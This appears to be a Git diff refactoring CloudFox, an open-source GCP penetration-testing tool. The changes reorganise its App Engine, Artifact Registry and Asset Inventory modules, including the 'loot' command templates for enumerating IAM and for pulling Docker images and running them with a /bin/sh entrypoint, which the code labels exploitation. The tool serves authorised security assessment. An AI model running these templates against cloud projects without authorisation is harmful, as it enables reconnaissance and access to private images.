[]string{ - issue.ServiceID, - issue.VersionID, - issue.IssueType, - issue.Severity, - truncateString(issue.Description, 40), - }) - - // Add remediation commands - m.LootMap["app-engine-commands"].Contents += fmt.Sprintf( - "# %s - %s (%s)\n# %s\n# Remediation: %s\n\n", - issue.ServiceID, issue.VersionID, issue.IssueType, - issue.Description, issue.Remediation, - ) - } + tables = append(tables, internal.TableFile{ + Name: "appengine", + Header: header, + Body: body, + }) - // Firewall Rules table - firewallHeader := []string{ - "Priority", - "Action", - "Source Range", - "Project Name", - "Project ID", - "Description", - } + // Firewall rules table + if len(m.FirewallRules) > 0 { + var fwBody [][]string + for _, rule := range m.FirewallRules { + fwBody = append(fwBody, []string{ + rule.ProjectID, + m.GetProjectName(rule.ProjectID), + fmt.Sprintf("%d", rule.Priority), + rule.Action, + rule.SourceRange, + rule.Description, + }) + } - var firewallBody [][]string - for _, rule := range m.FirewallRules { - firewallBody = append(firewallBody, []string{ - fmt.Sprintf("%d", rule.Priority), - rule.Action, - rule.SourceRange, - m.GetProjectName(rule.ProjectID), - rule.ProjectID, - truncateString(rule.Description, 30), + tables = append(tables, internal.TableFile{ + Name: "appengine-firewall", + Header: []string{ + "Project ID", + "Project Name", + "Priority", + "Action", + "Source Range", + "Description", + }, + Body: fwBody, }) } @@ -731,61 +590,16 @@ func (m *AppEngineModule) writeOutput(ctx context.Context, logger internal.Logge } } - // Build tables - tables := []internal.TableFile{} - - if len(appsBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "app-engine-apps", - Header: appsHeader, - Body: appsBody, - }) - } - - if len(servicesBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "app-engine-services", - Header: servicesHeader, - Body: servicesBody, - }) - } - - if len(versionsBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "app-engine-versions", - Header: versionsHeader, - Body: versionsBody, - }) - } - - if len(issuesBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "security-issues", - Header: issuesHeader, - Body: issuesBody, - }) - } - - if len(firewallBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "firewall-rules", - Header: firewallHeader, - Body: firewallBody, - }) - } - output := AppEngineOutput{ Table: tables, Loot: lootFiles, } - // Build scope names using project names scopeNames := make([]string, len(m.ProjectIDs)) for i, projectID := range m.ProjectIDs { scopeNames[i] = m.GetProjectName(projectID) } - // Write output err := internal.HandleOutputSmart( "gcp", m.Format, @@ -793,8 +607,8 @@ func (m *AppEngineModule) writeOutput(ctx context.Context, logger internal.Logge m.Verbosity, m.WrapTable, "project", - scopeNames, m.ProjectIDs, + scopeNames, m.Account, output, ) diff --git a/gcp/commands/artifact-registry.go b/gcp/commands/artifact-registry.go index a7dfe376..ed393abd 100644 --- a/gcp/commands/artifact-registry.go +++ b/gcp/commands/artifact-registry.go @@ -157,46 +157,9 @@ func (m *ArtifactRegistryModule) processProject(ctx context.Context, projectID s // Loot File Management // ------------------------------ func (m *ArtifactRegistryModule) initializeLootFiles() { - m.LootMap["artifact-registry-gcloud-commands"] = &internal.LootFile{ - Name: "artifact-registry-gcloud-commands", - Contents: "# GCP Artifact Registry Commands\n# Generated by CloudFox\n\n", - } - m.LootMap["artifact-registry-docker-commands"] = &internal.LootFile{ - Name: "artifact-registry-docker-commands", - Contents: "# GCP Artifact Registry Docker Commands\n# Generated by CloudFox\n\n", - } - m.LootMap["artifact-registry-exploitation"] = &internal.LootFile{ - Name: "artifact-registry-exploitation", - Contents: "# GCP Artifact Registry Exploitation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", - } - m.LootMap["artifact-registry-public"] = &internal.LootFile{ - Name: "artifact-registry-public", - Contents: "# PUBLIC GCP Artifact Registry Repositories\n# Generated by CloudFox\n# These repositories have allUsers or allAuthenticatedUsers access!\n\n", - } - m.LootMap["artifact-registry-iam-bindings"] = &internal.LootFile{ - Name: "artifact-registry-iam-bindings", - Contents: "# GCP Artifact Registry IAM Bindings\n# Generated by CloudFox\n\n", - } - m.LootMap["container-registry-commands"] = &internal.LootFile{ - Name: "container-registry-commands", - Contents: "# GCP Container Registry (gcr.io) Commands\n# Generated by CloudFox\n# Legacy Container Registry - consider migrating to Artifact Registry\n\n", - } - // New enhancement loot files - m.LootMap["artifact-registry-vulnerability-scanning"] = &internal.LootFile{ - Name: "artifact-registry-vulnerability-scanning", - Contents: "# GCP Artifact Registry Vulnerability Scanning Commands\n# Use Container Analysis API to scan for vulnerabilities\n# Generated by CloudFox\n\n", - } - m.LootMap["artifact-registry-no-cleanup"] = &internal.LootFile{ - Name: "artifact-registry-no-cleanup", - Contents: "# GCP Artifact Registry Repositories WITHOUT Cleanup Policies\n# These repositories may accumulate old artifacts\n# Generated by CloudFox\n\n", - } - m.LootMap["artifact-registry-remote-repos"] = &internal.LootFile{ - Name: "artifact-registry-remote-repos", - Contents: "# GCP Artifact Registry Remote Repositories\n# These proxy external registries - check for misconfigurations\n# Generated by CloudFox\n\n", - } - m.LootMap["artifact-registry-security-recommendations"] = &internal.LootFile{ - Name: "artifact-registry-security-recommendations", - Contents: "# GCP Artifact Registry Security Recommendations\n# Generated by CloudFox\n\n", + m.LootMap["artifact-registry-commands"] = &internal.LootFile{ + Name: "artifact-registry-commands", + Contents: "# GCP Artifact Registry Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } } @@ -210,8 +173,9 @@ func (m *ArtifactRegistryModule) addRepositoryToLoot(repo ArtifactRegistryServic // Handle legacy Container Registry differently if repo.RegistryType == "container-registry" { - m.LootMap["container-registry-commands"].Contents += fmt.Sprintf( - "# Container Registry: %s (Project: %s)\n"+ + m.LootMap["artifact-registry-commands"].Contents += fmt.Sprintf( + "## Legacy Container Registry: %s (Project: %s)\n"+ + "# Note: Consider migrating to Artifact Registry\n"+ "# Configure Docker authentication:\n"+ "gcloud auth configure-docker %s\n"+ "# List images:\n"+ @@ -226,197 +190,103 @@ func (m *ArtifactRegistryModule) addRepositoryToLoot(repo ArtifactRegistryServic return } - // gcloud commands for Artifact Registry enumeration - m.LootMap["artifact-registry-gcloud-commands"].Contents += fmt.Sprintf( - "# Repository: %s (Project: %s, Location: %s, Format: %s)\n"+ - "# Mode: %s, Encryption: %s, Public: %s\n"+ + // Repository header and enumeration commands + m.LootMap["artifact-registry-commands"].Contents += fmt.Sprintf( + "## Repository: %s (Project: %s, Location: %s)\n"+ + "# Format: %s, Mode: %s, Encryption: %s, Public: %s\n"+ + "# Describe repository:\n"+ "gcloud artifacts repositories describe %s --project=%s --location=%s\n"+ - "gcloud artifacts repositories get-iam-policy %s --project=%s --location=%s\n\n", - repoName, repo.ProjectID, repo.Location, repo.Format, - repo.Mode, repo.EncryptionType, repo.PublicAccess, + "# Get IAM policy:\n"+ + "gcloud artifacts repositories get-iam-policy %s --project=%s --location=%s\n", + repoName, repo.ProjectID, repo.Location, + repo.Format, repo.Mode, repo.EncryptionType, repo.PublicAccess, repoName, repo.ProjectID, repo.Location, repoName, repo.ProjectID, repo.Location, ) - // Docker commands for Docker repositories + // Docker-specific commands if repo.Format == "DOCKER" { - m.LootMap["artifact-registry-docker-commands"].Contents += fmt.Sprintf( - "# Docker Repository: %s\n"+ - "# Configure Docker authentication:\n"+ + m.LootMap["artifact-registry-commands"].Contents += fmt.Sprintf( + "# Configure Docker authentication:\n"+ "gcloud auth configure-docker %s-docker.pkg.dev\n"+ "# List images:\n"+ - "gcloud artifacts docker images list %s-docker.pkg.dev/%s/%s\n\n", - repoName, + "gcloud artifacts docker images list %s-docker.pkg.dev/%s/%s\n"+ + "# List vulnerabilities:\n"+ + "gcloud artifacts docker images list %s-docker.pkg.dev/%s/%s --show-occurrences --occurrence-filter=\"kind=VULNERABILITY\"\n", repo.Location, repo.Location, repo.ProjectID, repoName, - ) - } - - // Public repositories - if repo.IsPublic { - m.LootMap["artifact-registry-public"].Contents += fmt.Sprintf( - "# REPOSITORY: %s\n"+ - "# Project: %s, Location: %s\n"+ - "# Public Access: %s\n"+ - "# Format: %s, Mode: %s\n"+ - "gcloud artifacts repositories get-iam-policy %s --project=%s --location=%s\n\n", - repoName, - repo.ProjectID, repo.Location, - repo.PublicAccess, - repo.Format, repo.Mode, - repoName, repo.ProjectID, repo.Location, - ) - } - - // IAM bindings - if len(repo.IAMBindings) > 0 { - m.LootMap["artifact-registry-iam-bindings"].Contents += fmt.Sprintf( - "# Repository: %s (Project: %s, Location: %s)\n", - repoName, repo.ProjectID, repo.Location, - ) - for _, binding := range repo.IAMBindings { - m.LootMap["artifact-registry-iam-bindings"].Contents += fmt.Sprintf( - "# Role: %s\n# Members: %s\n", - binding.Role, - strings.Join(binding.Members, ", "), - ) - } - m.LootMap["artifact-registry-iam-bindings"].Contents += "\n" - } - - // Enhancement: Vulnerability scanning commands for Docker repos - if repo.Format == "DOCKER" { - m.LootMap["artifact-registry-vulnerability-scanning"].Contents += fmt.Sprintf( - "# Repository: %s (Project: %s, Location: %s)\n"+ - "# List vulnerability occurrences:\n"+ - "gcloud artifacts docker images list %s-docker.pkg.dev/%s/%s --show-occurrences --occurrence-filter=\"kind=VULNERABILITY\"\n"+ - "# Get detailed vulnerabilities for a specific image:\n"+ - "# gcloud artifacts docker images describe %s-docker.pkg.dev/%s/%s/IMAGE:TAG --show-package-vulnerability\n\n", - repoName, repo.ProjectID, repo.Location, - repo.Location, repo.ProjectID, repoName, repo.Location, repo.ProjectID, repoName, ) } - // Enhancement: No cleanup policies - if repo.CleanupPolicies == 0 { - m.LootMap["artifact-registry-no-cleanup"].Contents += fmt.Sprintf( - "# Repository: %s (Project: %s, Location: %s)\n"+ - "# Format: %s, Mode: %s\n"+ - "# No cleanup policies - old artifacts may accumulate\n"+ - "# Add cleanup policy: gcloud artifacts repositories set-cleanup-policies %s --location=%s --project=%s --policy=\n\n", - repoName, repo.ProjectID, repo.Location, - repo.Format, repo.Mode, - repoName, repo.Location, repo.ProjectID, - ) - } - - // Enhancement: Remote repositories - if strings.Contains(repo.Mode, "REMOTE") { - m.LootMap["artifact-registry-remote-repos"].Contents += fmt.Sprintf( - "# Repository: %s (Project: %s, Location: %s)\n"+ - "# Mode: %s - Proxies external registry\n"+ - "# Check configuration: gcloud artifacts repositories describe %s --location=%s --project=%s\n"+ - "# Remote repos may cache external images - check for sensitive data\n\n", - repoName, repo.ProjectID, repo.Location, - repo.Mode, - repoName, repo.Location, repo.ProjectID, - ) - } - - // Add security recommendations - m.addRepositorySecurityRecommendations(repo, repoName) -} - -// addRepositorySecurityRecommendations generates security recommendations for a repository -func (m *ArtifactRegistryModule) addRepositorySecurityRecommendations(repo ArtifactRegistryService.RepositoryInfo, repoName string) { - hasRecommendations := false - recommendations := fmt.Sprintf("# REPOSITORY: %s (Project: %s, Location: %s)\n", repoName, repo.ProjectID, repo.Location) - - // Public access - if repo.IsPublic { - hasRecommendations = true - recommendations += fmt.Sprintf("# [CRITICAL] Repository is publicly accessible: %s\n", repo.PublicAccess) - recommendations += "# Remediation: Remove public access\n" - recommendations += fmt.Sprintf("gcloud artifacts repositories remove-iam-policy-binding %s --location=%s --member=allUsers --role=roles/artifactregistry.reader\n", - repoName, repo.Location) - } - - // Google-managed encryption - if repo.EncryptionType == "Google-managed" { - hasRecommendations = true - recommendations += "# [INFO] Using Google-managed encryption - consider CMEK for compliance\n" - } - - // No cleanup policies - if repo.CleanupPolicies == 0 { - hasRecommendations = true - recommendations += "# [LOW] No cleanup policies configured - old artifacts may accumulate\n" - recommendations += fmt.Sprintf("# Add cleanup: gcloud artifacts repositories set-cleanup-policies %s --location=%s --policy=cleanup.json\n", - repoName, repo.Location) - } - - // Legacy container registry - if repo.RegistryType == "container-registry" { - hasRecommendations = true - recommendations += "# [MEDIUM] Using legacy Container Registry (gcr.io)\n" - recommendations += "# Recommendation: Migrate to Artifact Registry for better security features\n" - recommendations += fmt.Sprintf("# Migration guide: https://cloud.google.com/artifact-registry/docs/transition/transition-from-gcr\n") - } - - if hasRecommendations { - m.LootMap["artifact-registry-security-recommendations"].Contents += recommendations + "\n" - } + m.LootMap["artifact-registry-commands"].Contents += "\n" } func (m *ArtifactRegistryModule) addArtifactToLoot(artifact ArtifactRegistryService.ArtifactInfo) { // Exploitation commands for Docker images if artifact.Format == "DOCKER" { - m.LootMap["artifact-registry-exploitation"].Contents += fmt.Sprintf( - "# Docker Image: %s (Version: %s)\n"+ - "# Pull image:\n"+ - "docker pull %s-docker.pkg.dev/%s/%s/%s:%s\n"+ - "# Inspect image:\n"+ - "docker inspect %s-docker.pkg.dev/%s/%s/%s:%s\n"+ - "# Run image for analysis:\n"+ - "docker run -it --entrypoint /bin/sh %s-docker.pkg.dev/%s/%s/%s:%s\n\n", - artifact.Name, artifact.Version, - artifact.Location, artifact.ProjectID, artifact.Repository, artifact.Name, artifact.Version, - artifact.Location, artifact.ProjectID, artifact.Repository, artifact.Name, artifact.Version, - artifact.Location, artifact.ProjectID, artifact.Repository, artifact.Name, artifact.Version, + imageBase := fmt.Sprintf("%s-docker.pkg.dev/%s/%s/%s", + artifact.Location, artifact.ProjectID, artifact.Repository, artifact.Name) + + m.LootMap["artifact-registry-commands"].Contents += fmt.Sprintf( + "## Docker Image: %s (Project: %s)\n"+ + "# Repository: %s, Location: %s\n"+ + "# Digest: %s\n", + artifact.Name, artifact.ProjectID, + artifact.Repository, artifact.Location, + artifact.Digest, ) - } -} -// ------------------------------ -// Helper Functions -// ------------------------------ -func artifactBoolToCheck(b bool) string { - if b { - return "✓" + // Generate commands for each tag + if len(artifact.Tags) > 0 { + for _, tag := range artifact.Tags { + m.LootMap["artifact-registry-commands"].Contents += fmt.Sprintf( + "# Tag: %s\n"+ + "docker pull %s:%s\n"+ + "docker inspect %s:%s\n"+ + "docker run -it --entrypoint /bin/sh %s:%s\n\n", + tag, + imageBase, tag, + imageBase, tag, + imageBase, tag, + ) + } + } else { + // No tags, use digest + m.LootMap["artifact-registry-commands"].Contents += fmt.Sprintf( + "# No tags - use digest\n"+ + "docker pull %s@%s\n"+ + "docker inspect %s@%s\n"+ + "docker run -it --entrypoint /bin/sh %s@%s\n\n", + imageBase, artifact.Digest, + imageBase, artifact.Digest, + imageBase, artifact.Digest, + ) + } } - return "-" } // ------------------------------ // Output Generation // ------------------------------ func (m *ArtifactRegistryModule) writeOutput(ctx context.Context, logger internal.Logger) { - // Main repository table with security-relevant columns + // Repository table with IAM columns (one row per IAM member) repoHeader := []string{ - "Project Name", "Project ID", + "Project Name", "Name", "Format", "Location", "Mode", "Public", "Encryption", - "RegistryType", - "Size", + "Role", + "Member Type", + "Member", } var repoBody [][]string + publicCount := 0 for _, repo := range m.Repositories { // Extract repo name from full path repoName := repo.Name @@ -426,9 +296,10 @@ func (m *ArtifactRegistryModule) writeOutput(ctx context.Context, logger interna } // Format public access display - publicDisplay := repo.PublicAccess + publicDisplay := "" if repo.IsPublic { - publicDisplay = "PUBLIC: " + repo.PublicAccess + publicDisplay = repo.PublicAccess + publicCount++ } // Shorten mode for display @@ -436,24 +307,48 @@ func (m *ArtifactRegistryModule) writeOutput(ctx context.Context, logger interna mode = strings.TrimPrefix(mode, "REPOSITORY_MODE_") mode = strings.TrimSuffix(mode, "_REPOSITORY") - repoBody = append(repoBody, []string{ - m.GetProjectName(repo.ProjectID), - repo.ProjectID, - repoName, - repo.Format, - repo.Location, - mode, - publicDisplay, - repo.EncryptionType, - repo.RegistryType, - repo.SizeBytes, - }) + // One row per IAM member + if len(repo.IAMBindings) > 0 { + for _, binding := range repo.IAMBindings { + for _, member := range binding.Members { + memberType := ArtifactRegistryService.GetMemberType(member) + repoBody = append(repoBody, []string{ + repo.ProjectID, + m.GetProjectName(repo.ProjectID), + repoName, + repo.Format, + repo.Location, + mode, + publicDisplay, + repo.EncryptionType, + binding.Role, + memberType, + member, + }) + } + } + } else { + // Repository with no IAM bindings + repoBody = append(repoBody, []string{ + repo.ProjectID, + m.GetProjectName(repo.ProjectID), + repoName, + repo.Format, + repo.Location, + mode, + publicDisplay, + repo.EncryptionType, + "-", + "-", + "-", + }) + } } - // Artifact table with enhanced fields + // Artifact table artifactHeader := []string{ - "Project Name", "Project ID", + "Project Name", "Name", "Repository", "Location", @@ -475,15 +370,11 @@ func (m *ArtifactRegistryModule) writeOutput(ctx context.Context, logger interna } } - // Shorten digest for display digest := artifact.Digest - if len(digest) > 16 { - digest = digest[:16] + "..." - } artifactBody = append(artifactBody, []string{ - m.GetProjectName(artifact.ProjectID), artifact.ProjectID, + m.GetProjectName(artifact.ProjectID), artifact.Name, artifact.Repository, artifact.Location, @@ -494,82 +385,10 @@ func (m *ArtifactRegistryModule) writeOutput(ctx context.Context, logger interna }) } - // IAM bindings table - one row per member - iamHeader := []string{ - "Repository", - "Project Name", - "Project ID", - "Location", - "Role", - "Member Type", - "Member", - } - - var iamBody [][]string - for _, repo := range m.Repositories { - // Skip container-registry entries (no IAM at repo level) - if repo.RegistryType == "container-registry" { - continue - } - - repoName := repo.Name - parts := strings.Split(repo.Name, "/") - if len(parts) > 0 { - repoName = parts[len(parts)-1] - } - - for _, binding := range repo.IAMBindings { - for _, member := range binding.Members { - memberType := ArtifactRegistryService.GetMemberType(member) - iamBody = append(iamBody, []string{ - repoName, - m.GetProjectName(repo.ProjectID), - repo.ProjectID, - repo.Location, - binding.Role, - memberType, - member, - }) - } - } - } - - // Public repositories table - publicHeader := []string{ - "Repository", - "Project Name", - "Project ID", - "Location", - "Format", - "Public Access", - "Mode", - } - - var publicBody [][]string - for _, repo := range m.Repositories { - if repo.IsPublic { - repoName := repo.Name - parts := strings.Split(repo.Name, "/") - if len(parts) > 0 { - repoName = parts[len(parts)-1] - } - - publicBody = append(publicBody, []string{ - repoName, - m.GetProjectName(repo.ProjectID), - repo.ProjectID, - repo.Location, - repo.Format, - repo.PublicAccess, - repo.Mode, - }) - } - } - // Collect loot files var lootFiles []internal.LootFile for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } @@ -592,22 +411,8 @@ func (m *ArtifactRegistryModule) writeOutput(ctx context.Context, logger interna }) } - // Add IAM table if there are bindings - if len(iamBody) > 0 { - tableFiles = append(tableFiles, internal.TableFile{ - Name: "artifact-registry-iam", - Header: iamHeader, - Body: iamBody, - }) - } - - // Add public repositories table if any - if len(publicBody) > 0 { - tableFiles = append(tableFiles, internal.TableFile{ - Name: "artifact-registry-public", - Header: publicHeader, - Body: publicBody, - }) + if publicCount > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Found %d publicly accessible repository(ies)!", publicCount), globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) } output := ArtifactRegistryOutput{ diff --git a/gcp/commands/assetinventory.go b/gcp/commands/assetinventory.go index cbd7ba9d..937f0348 100644 --- a/gcp/commands/assetinventory.go +++ b/gcp/commands/assetinventory.go @@ -7,23 +7,28 @@ import ( "strings" "sync" + asset "cloud.google.com/go/asset/apiv1" + "cloud.google.com/go/asset/apiv1/assetpb" assetservice "github.com/BishopFox/cloudfox/gcp/services/assetService" "github.com/BishopFox/cloudfox/globals" "github.com/BishopFox/cloudfox/internal" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/spf13/cobra" + "google.golang.org/api/iterator" ) var ( - assetTypes []string - showCounts bool - checkIAM bool + assetTypes []string + showCounts bool + checkIAM bool + showDependencies bool + showAll bool ) var GCPAssetInventoryCommand = &cobra.Command{ Use: globals.GCP_ASSET_INVENTORY_MODULE_NAME, - Aliases: []string{"assets", "inventory", "cai"}, - Short: "Enumerate Cloud Asset Inventory", + Aliases: []string{"assets", "inventory", "cai", "resource-graph"}, + Short: "Enumerate Cloud Asset Inventory with optional dependency analysis", Long: `Enumerate resources using Cloud Asset Inventory API. Features: @@ -31,27 +36,56 @@ Features: - Provides asset counts by type - Can check IAM policies for public access - Supports filtering by asset type +- Analyzes resource dependencies and cross-project relationships +- Generates query templates for common security use cases + +Flags can be combined to run multiple analyses in a single run. Examples: cloudfox gcp asset-inventory -p my-project cloudfox gcp asset-inventory -p my-project --counts cloudfox gcp asset-inventory -p my-project --iam + cloudfox gcp asset-inventory -p my-project --dependencies + cloudfox gcp asset-inventory -p my-project --counts --iam --dependencies + cloudfox gcp asset-inventory -p my-project --all cloudfox gcp asset-inventory -p my-project --types compute.googleapis.com/Instance,storage.googleapis.com/Bucket`, Run: runGCPAssetInventoryCommand, } func init() { GCPAssetInventoryCommand.Flags().StringSliceVar(&assetTypes, "types", []string{}, "Filter by asset types (comma-separated)") - GCPAssetInventoryCommand.Flags().BoolVar(&showCounts, "counts", false, "Show asset counts by type only") + GCPAssetInventoryCommand.Flags().BoolVar(&showCounts, "counts", false, "Show asset counts by type") GCPAssetInventoryCommand.Flags().BoolVar(&checkIAM, "iam", false, "Check IAM policies for public access") + GCPAssetInventoryCommand.Flags().BoolVar(&showDependencies, "dependencies", false, "Analyze resource dependencies and cross-project relationships") + GCPAssetInventoryCommand.Flags().BoolVar(&showAll, "all", false, "Run all analyses (counts, IAM, dependencies)") +} + +// ResourceDependency represents a dependency between two resources +type ResourceDependency struct { + SourceResource string + SourceType string + TargetResource string + TargetType string + DependencyType string // uses, references, contains + ProjectID string +} + +// CrossProjectResource represents a resource accessed from multiple projects +type CrossProjectResource struct { + ResourceName string + ResourceType string + OwnerProject string + AccessedFrom []string } type AssetInventoryModule struct { gcpinternal.BaseGCPModule - Assets []assetservice.AssetInfo - TypeCounts []assetservice.AssetTypeCount - LootMap map[string]*internal.LootFile - mu sync.Mutex + Assets []assetservice.AssetInfo + TypeCounts []assetservice.AssetTypeCount + Dependencies []ResourceDependency + CrossProject []CrossProjectResource + LootMap map[string]*internal.LootFile + mu sync.Mutex } type AssetInventoryOutput struct { @@ -72,6 +106,8 @@ func runGCPAssetInventoryCommand(cmd *cobra.Command, args []string) { BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), Assets: []assetservice.AssetInfo{}, TypeCounts: []assetservice.AssetTypeCount{}, + Dependencies: []ResourceDependency{}, + CrossProject: []CrossProjectResource{}, LootMap: make(map[string]*internal.LootFile), } module.initializeLootFiles() @@ -79,41 +115,69 @@ func runGCPAssetInventoryCommand(cmd *cobra.Command, args []string) { } func (m *AssetInventoryModule) Execute(ctx context.Context, logger internal.Logger) { + // If --all is set, enable all flags + if showAll { + showCounts = true + checkIAM = true + showDependencies = true + } + + // If no flags set, default to basic asset listing + noFlagsSet := !showCounts && !checkIAM && !showDependencies + + // Run requested analyses if showCounts { m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_ASSET_INVENTORY_MODULE_NAME, m.processProjectCounts) - } else if checkIAM { + } + + if checkIAM { m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_ASSET_INVENTORY_MODULE_NAME, m.processProjectIAM) - } else { + } else if noFlagsSet { + // Only run basic listing if no flags and IAM not requested (IAM includes basic info) m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_ASSET_INVENTORY_MODULE_NAME, m.processProject) } - if showCounts { - if len(m.TypeCounts) == 0 { - logger.InfoM("No assets found", globals.GCP_ASSET_INVENTORY_MODULE_NAME) - return - } - logger.SuccessM(fmt.Sprintf("Found %d asset type(s)", len(m.TypeCounts)), globals.GCP_ASSET_INVENTORY_MODULE_NAME) - } else { - if len(m.Assets) == 0 { - logger.InfoM("No assets found", globals.GCP_ASSET_INVENTORY_MODULE_NAME) - return - } + if showDependencies { + m.processProjectsDependencies(ctx, logger) + } + + // Build summary message + var summaryParts []string + + if len(m.TypeCounts) > 0 { + summaryParts = append(summaryParts, fmt.Sprintf("%d asset type(s)", len(m.TypeCounts))) + } + + if len(m.Assets) > 0 { + summaryParts = append(summaryParts, fmt.Sprintf("%d asset(s)", len(m.Assets))) + } + if checkIAM { publicCount := 0 for _, asset := range m.Assets { if asset.PublicAccess { publicCount++ } } - - if checkIAM { - logger.SuccessM(fmt.Sprintf("Found %d asset(s) (%d with public access)", - len(m.Assets), publicCount), globals.GCP_ASSET_INVENTORY_MODULE_NAME) - } else { - logger.SuccessM(fmt.Sprintf("Found %d asset(s)", len(m.Assets)), globals.GCP_ASSET_INVENTORY_MODULE_NAME) + if publicCount > 0 { + summaryParts = append(summaryParts, fmt.Sprintf("%d with public access", publicCount)) } } + if len(m.Dependencies) > 0 { + summaryParts = append(summaryParts, fmt.Sprintf("%d dependencies", len(m.Dependencies))) + } + + if len(m.CrossProject) > 0 { + summaryParts = append(summaryParts, fmt.Sprintf("%d cross-project resources", len(m.CrossProject))) + } + + if len(summaryParts) == 0 { + logger.InfoM("No assets found", globals.GCP_ASSET_INVENTORY_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %s", strings.Join(summaryParts, ", ")), globals.GCP_ASSET_INVENTORY_MODULE_NAME) m.writeOutput(ctx, logger) } @@ -195,31 +259,252 @@ func (m *AssetInventoryModule) processProjectCounts(ctx context.Context, project m.mu.Unlock() } +// processProjectsDependencies analyzes assets with full dependency tracking +func (m *AssetInventoryModule) processProjectsDependencies(ctx context.Context, logger internal.Logger) { + logger.InfoM("Analyzing assets and dependencies...", globals.GCP_ASSET_INVENTORY_MODULE_NAME) + + assetClient, err := asset.NewClient(ctx) + if err != nil { + logger.ErrorM(fmt.Sprintf("Failed to create Cloud Asset client: %v", err), globals.GCP_ASSET_INVENTORY_MODULE_NAME) + return + } + defer assetClient.Close() + + var wg sync.WaitGroup + for _, projectID := range m.ProjectIDs { + wg.Add(1) + go func(project string) { + defer wg.Done() + m.processProjectWithDependencies(ctx, project, assetClient, logger) + }(projectID) + } + wg.Wait() + + // Analyze cross-project dependencies + m.analyzeCrossProjectResources() + + // Generate query templates + m.generateQueryTemplates() +} + +func (m *AssetInventoryModule) processProjectWithDependencies(ctx context.Context, projectID string, assetClient *asset.Client, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Analyzing dependencies in project: %s", projectID), globals.GCP_ASSET_INVENTORY_MODULE_NAME) + } + + parent := fmt.Sprintf("projects/%s", projectID) + req := &assetpb.ListAssetsRequest{ + Parent: parent, + ContentType: assetpb.ContentType_RESOURCE, + PageSize: 500, + } + + it := assetClient.ListAssets(ctx, req) + + for { + assetItem, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_ASSET_INVENTORY_MODULE_NAME, + fmt.Sprintf("Could not enumerate assets in project %s", projectID)) + break + } + + // Convert to AssetInfo for consistency + assetInfo := assetservice.AssetInfo{ + Name: assetItem.Name, + AssetType: assetItem.AssetType, + ProjectID: projectID, + } + + if assetItem.Resource != nil { + assetInfo.Location = assetItem.Resource.Location + } + + m.mu.Lock() + m.Assets = append(m.Assets, assetInfo) + m.mu.Unlock() + + // Analyze dependencies + m.analyzeAssetDependencies(assetItem, projectID) + } +} + +func (m *AssetInventoryModule) analyzeAssetDependencies(assetItem *assetpb.Asset, projectID string) { + if assetItem.Resource == nil || assetItem.Resource.Data == nil { + return + } + + // Common dependency patterns + dependencyFields := map[string]string{ + "network": "uses", + "subnetwork": "uses", + "serviceAccount": "uses", + "disk": "uses", + "snapshot": "references", + "image": "references", + "keyRing": "uses", + "cryptoKey": "uses", + "topic": "references", + "subscription": "references", + "bucket": "uses", + "dataset": "references", + "cluster": "contains", + } + + for field, depType := range dependencyFields { + if value, ok := assetItem.Resource.Data.Fields[field]; ok { + targetResource := value.GetStringValue() + if targetResource != "" { + dependency := ResourceDependency{ + SourceResource: assetItem.Name, + SourceType: assetItem.AssetType, + TargetResource: targetResource, + TargetType: m.inferResourceType(field), + DependencyType: depType, + ProjectID: projectID, + } + + m.mu.Lock() + m.Dependencies = append(m.Dependencies, dependency) + m.mu.Unlock() + } + } + } +} + +func (m *AssetInventoryModule) inferResourceType(fieldName string) string { + typeMap := map[string]string{ + "network": "compute.googleapis.com/Network", + "subnetwork": "compute.googleapis.com/Subnetwork", + "serviceAccount": "iam.googleapis.com/ServiceAccount", + "disk": "compute.googleapis.com/Disk", + "snapshot": "compute.googleapis.com/Snapshot", + "image": "compute.googleapis.com/Image", + "keyRing": "cloudkms.googleapis.com/KeyRing", + "cryptoKey": "cloudkms.googleapis.com/CryptoKey", + "topic": "pubsub.googleapis.com/Topic", + "subscription": "pubsub.googleapis.com/Subscription", + "bucket": "storage.googleapis.com/Bucket", + "dataset": "bigquery.googleapis.com/Dataset", + "cluster": "container.googleapis.com/Cluster", + } + + if assetType, ok := typeMap[fieldName]; ok { + return assetType + } + return "unknown" +} + +func (m *AssetInventoryModule) analyzeCrossProjectResources() { + m.mu.Lock() + defer m.mu.Unlock() + + targetToSources := make(map[string][]string) + targetToType := make(map[string]string) + + for _, dep := range m.Dependencies { + targetProject := m.extractProjectFromResource(dep.TargetResource) + if targetProject != "" && targetProject != dep.ProjectID { + targetToSources[dep.TargetResource] = append(targetToSources[dep.TargetResource], dep.ProjectID) + targetToType[dep.TargetResource] = dep.TargetType + } + } + + for target, sources := range targetToSources { + crossProject := CrossProjectResource{ + ResourceName: target, + ResourceType: targetToType[target], + OwnerProject: m.extractProjectFromResource(target), + AccessedFrom: sources, + } + + m.CrossProject = append(m.CrossProject, crossProject) + } +} + +func (m *AssetInventoryModule) extractProjectFromResource(resource string) string { + if strings.Contains(resource, "projects/") { + parts := strings.Split(resource, "/") + for i, part := range parts { + if part == "projects" && i+1 < len(parts) { + return parts[i+1] + } + } + } + return "" +} + +func (m *AssetInventoryModule) extractResourceName(resource string) string { 